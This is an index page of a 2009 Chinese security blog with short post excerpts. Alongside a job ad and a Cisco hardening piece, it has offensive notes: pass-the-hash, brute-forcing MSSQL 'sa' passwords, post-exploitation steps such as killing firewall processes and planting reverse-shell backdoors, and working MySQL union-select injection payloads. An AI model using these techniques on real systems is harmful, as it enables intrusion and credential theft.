人的头脑太复杂,时间过得久,有时候连自己也被自己骗了,记下来才是最真实的...... 注册 | 登陆
浏览模式: 标准 | 列表全部文章

[置顶] 新书预告<黑客渗透笔记>

Submitted by 谈笑书生 on 2009, May 21, 1:36 PM

官方连接:http://www.nohack.cn/bbs/thread-96363-1-1.html

新书预告<黑客渗透笔记>快赏

 

» 阅读全文

技术专题 | 评论:0 | 阅读:201

[置顶] 上海绿盟招安全顾问

Submitted by 谈笑书生 on 2009, March 31, 10:43 AM

要求:
有安全相关工作经验,学历本科。
职责:主要是售后,会有一些售前工作。主要是安全评估、加固。能渗透更好。
有意者发简历给<zhumaster@gmail.com>。
工作地点:上海

» 阅读全文

信息安全 | 评论:0 | 阅读:307

Cisco路由器及交换机安全加固

Submitted by 谈笑书生 on 2009, June 27, 9:57 AM

根据木桶理论,一个桶能装多少水,取决于这个桶最短的那块木板。具体到信息系统的安全也是一样,整个信息系统的安全程度也取决于信息系统中最薄弱的环节,网络做为信息系统的体,其安全需求的重要性是显而易见的。
网络层面的安全主要有两个方面,一是数据层面的安全,使用ACL等技术手段,辅助应用系统增强系统的整体安全;二是控制层面的安全,通过限制对网 络设备自身的访问,增强网络设备自身的安全性。数据层面的安全在拙著《网络层权限访问控制――ACL详解》(http: //www.yesky.com/bang/77687093572141056/20030708/1712713.shtml)已经较为系统的讨论。 本文主要集中讨论控制层面即设备自身的安全这部分,仍以最大市场占有率的思科设备为例进行讨论。

» 阅读全文

技术文章 | 评论:0 | 阅读:27

2003系统错误大全解释

Submitted by 谈笑书生 on 2009, June 12, 2:52 AM

MS Windows Error Messages

 

Code Error Message
0 操作成功完成。
1 功能错误。
2 系统找不到指定的文件。
3 系统找不到指定的路径。
4 系统无法打开文件。
5 拒绝访问。
6 句柄无效。
7 存储控制块被损坏。
8 存储空间不足,无法处理此命令。
9 存储控制块地址无效。
10 环境错误。

» 阅读全文

乱七八糟 | 评论:0 | 阅读:59

关于windows HASH散列注入攻击

Submitted by 谈笑书生 on 2009, June 11, 10:53 AM

在Windows 操作系统内网渗透的过程中,我们经常会碰上许多问题。

其中关于HASH这一块就比较多的问题,列如我们能够用常用的gsechash、gethashes等工具抓到WINDOWS的HASH散列值的话。也经常会有破解不了。

原因有二:

一、你的彩虹表字典进行暴力破解时字典内容不够强大;现如今网上流传的是120G的彩虹表,可供破解14位以内大部分密码HASH散列值。

二、你所抓取的HASH散列原本就是错误的。

在碰到这种情况下,我们往往会想到的就是HASH注入攻击

» 阅读全文

学习笔记 | 评论:0 | 阅读:102

blog换空间了。

Submitted by 谈笑书生 on 2009, May 21, 1:34 PM

以前的空间到期,最近停了一个月。

感谢桥哥提供空间,膜拜!!!

 

» 阅读全文

心情杂记 | 评论:0 | 阅读:81

破解MSSQL的SA密码

Submitted by 谈笑书生 on 2009, April 21, 4:44 PM

代码演示暴力破解MSSQL的帐号和密码,包括管理员帐号sa的密码。

今天看到网上有这样一篇文章“一个SQL Server Sa密码破解的存储过程”:http://www.wangchao.net.cn/bbsdetail_1804540.html,方法就是暴力破解MSSQL的帐号和密码,包括管理员帐号sa的密码,发现写的很好,不知原贴何处,网上有多处转载,下面我对其它的代码稍做修改,并进行了一些性能分析。

首先说说破解过程序核心思想,就是存储帐号密码的master.dbo.sysxlogins表和未公布的密码比较存储过程pwdcompare。经过一方分析,修改了部分代码,下面贴出修改前后的代码.

» 阅读全文

信息安全 | 评论:0 | 阅读:175

web,sql分离的一点想法

Submitted by 谈笑书生 on 2009, April 18, 11:22 AM

转自[虫子],写的嘛全面的。

 

例子:

1.web,sql分离(sql上网),sa. 读系统用户密码或加用户反弹,种反弹型后门.

2.web,sql分离(sql不上网),sa. 把和防火墙和策略有关的服务或进程kill掉再测试是否上网 收集尽量多的密码表.sqlsniffer findpass gethashs ipc$猜web密码 vbs读系统日志查看管理员登陆IP 有可能的话导出注册表的secpol查看策略规则.

 

3.web,sql分离(sql上网),dbo_owner. 猜密码进web后台. 备份hta到启动项

4.web,sql分离(sql不上网),dbo_owner.猜密码进web后台.

(重点在4,在opendatasource的时候不要以为弹不到外面的1433就不上网了,可以尝试其他的端口 比如20 21 25 443 445 80等防火墙经常开放的端口)

» 阅读全文

技术文章 | 评论:0 | 阅读:121

mysql5注入笔记

Submitted by 谈笑书生 on 2009, April 7, 9:25 PM

mysql新增加一个库叫information_schema,可以爆库爆表爆字段。
首先介绍一下的是爆库
select SCHEMA_NAME from information_schema.SCHEMATA limit 5,1/* 5,1表示从第1个开始,数到第5个
然后就是爆表了。
select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x6D656D626572 limit 5,1/*TABLE_SCHEMA=后面是库名的16进制
再来爆字段
select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x61646D5F75736572 limit 5,1/*

一.查看MYSQL基本信息(库名,版本,用户)
and 1=2 union select 1,2,3,database(),5,version(),6,user(),7..../*

» 阅读全文

学习笔记 | 评论:0 | 阅读:135

Records:22712345678910»